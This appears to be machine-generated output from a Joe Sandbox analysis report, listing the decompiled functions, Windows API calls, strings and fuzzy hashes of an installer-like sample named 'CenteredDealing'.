                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                        • String ID: F$%s=%s$NUL$[Rename]
                                                                                                                                                                                                                                                                        • API String ID: 565278875-1653569448
                                                                                                                                                                                                                                                                        • Opcode ID: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
                                                                                                                                                                                                                                                                        • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                                                                                                                                                                                                                        Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                        • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                        • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                        • String ID: F
                                                                                                                                                                                                                                                                        • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                        • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                                                                                                                                                                                                        • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                                                                                                                                                                                                                                        Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                        • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                        • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                        • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                        • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                        • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                        • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                        • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                        • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                        • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                                                                                                                                                                                                                        • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                                                                                                                                                                                                                                        Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                        • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                        • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                        • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                                                                                                                                                                                                                        • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                                                                                                                                                                                                                                        Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                                                                                                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                        • API String ID: 3734993849-2769509956
                                                                                                                                                                                                                                                                        • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                                                                                                                                                                                                        • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                                                                                                                                                                                                                                        Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                                                                                                                                                                                                                        • GetSysColor.USER32(00000000), ref: 00403E00
                                                                                                                                                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                                                                                                                                                                                                                        • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                                                                                                                                                                                                                        • GetSysColor.USER32(?), ref: 00403E2B
                                                                                                                                                                                                                                                                        • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 00403E55
                                                                                                                                                                                                                                                                        • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                        • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                                                                                                                                                                                        • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                                                                                                                                                                                                                        Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                        • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                        • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                        • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                                                                                                                                                                                                                        • API String ID: 1033533793-945480824
                                                                                                                                                                                                                                                                        • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                                                                                                                                                                                                        • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                                                                                                                                                                                                                        Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                          • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                                                                                                                                                                                          • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                        • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                        • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                        • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                        • API String ID: 2014279497-3433828417
